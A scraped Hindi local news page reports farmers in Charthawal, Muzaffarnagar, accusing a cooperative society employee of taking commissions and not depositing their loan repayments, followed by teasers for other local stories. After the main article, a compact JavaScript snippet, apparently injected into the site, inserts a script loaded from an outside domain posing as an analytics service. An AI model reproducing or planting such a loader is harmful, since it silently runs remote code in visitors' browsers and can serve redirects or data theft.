चरथावल सहकारी समिति के कर्मचारी पर भ्रष्टाचार का आरोप

Oplus_16908288

कुटेसरा गांव के किसानों ने थाने पहुंचकर किया प्रदर्शन, पुलस को सौंपा शिकायत पत्र, कार्यवाही की मांग

मुजफ्फरनगर। जनपद के थाना चरथावल क्षेत्र के कुटेसरा गांव निवासी कई किसानों ने सहकारी समिति चरथावल के कर्मचारी मोहसिन पर गंभीर आरोप लगाते हुए भ्रष्टाचार और गड़बड़ी की शिकायत दर्ज कराई है। किसानों का कहना है कि उन्होंने समिति से कृषि ऋण लिया था, जिसके बाद थाना क्षेत्र के गांव पावटी निवासी सहकारी समिति के कर्मचारी मोहसिन पुत्र यासीन ने उनसे 5 प्रतिशत कमीशन की मांग की।
सभी पीड़ित किसानों ने आरोप लगाया कि उन्होंने मोहसिन को रकम दे दी थी, लेकिन कर्मचारी ने पैसे समिति में जमा नहीं किए। इसके बाद मोहसिन खुद समिति का नोटिस लेकर किसानों के घर पहुंचा और पैसे जमा करने का दबाव बनाने लगा। जब किसानांे ने जमा रसीद और विवरण मांगा तो कर्मचारी कोई संतोषजनक जवाब नहीं दे सका। किसानों का कहना है कि समिति में इस तरह की लापरवाही और मनमानी लंबे समय से चल रही है। किसानों ने आरोप लगाया कि कर्मचारी किसानों से अवैध वसूली कर रहे हैं। पीड़ित किसानों ने किसान नेता शाहबाज त्यागी के साथ चरथावल थाने में पहुंच कर प्रदर्शन किया और पुलिस को शिकायत पत्र देते हुए आरोपी कर्मचारी के खिलाफ सख्त कार्रवाई की मांग की है। वहीं, पुलिस का कहना है कि मामले की जांच कर उचित कार्रवाई की जाएगी।

इसे भी पढ़ें:  देवशयनी एकादशी पर सत्संग का आयोजन

;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);

Also Read This

खतौली: बुढ़ाना रोड स्थित मकान में आगजनी, लाखों का सामान जलकर राख

खतौली नगर के बुढ़ाना रोड क्षेत्र में एक मकान में संदिग्ध परिस्थितियों में आग लगने का मामला सामने आया है। इस घटना में घर का कीमती सामान जलकर पूरी तरह राख हो गया। हालांकि राहत की बात यह रही कि इस हादसे में कोई जनहानि नहीं हुई। प्राप्त जानकारी के अनुसार, इकराम पुत्र अकबर निवासी बघरा तितावी का अपनी पत्नी समीना से तीन तलाक कुछ समय पहले हो चुका था। इसके बाद समीना ने सादिक नगर निवासी इरशाद अहमद से दूसरी शादी कर ली थी। शादी के बाद समीना और इरशाद खतौली के बुढ़ाना रोड स्थित एक मकान में साथ रह रहे थे। घटना के दिन समीना बाजार गई हुई थी,

Read More »

डी एस पब्लिक स्कूल के गर्व गोयल ने 90% अंक हासिल किए

मुजफ्फरनगर। डी एस पब्लिक स्कूल के प्रतिभाशाली छात्र गर्व गोयल ने सीबीएसई हाई स्कूल परीक्षा में 90 प्रतिशत अंक प्राप्त कर विद्यालय, परिवार और क्षेत्र का नाम रोशन किया है। उनकी इस उपलब्धि ने एक बार फिर साबित किया है कि अनुशासन, समर्पण और निरंतर मेहनत से बड़ी सफलता हासिल की जा सकती है। गर्व गोयल वरिष्ठ पत्रकार और राजनीतिज्ञ राजीव गोयल के सुपुत्र हैं। इसे भी पढ़ें:  मुजफ्फरनगर में 73 वर्षीय बुजुर्ग ने 13 साल की बच्ची से की दरिंदगीगर्व गोयल ने अपनी सफलता का श्रेय अपने माता-पिता और शिक्षकों को दिया है। उनका कहना है कि उनके मार्गदर्शन और सहयोग के बिना यह संभव नहीं था। साथ ही

Read More »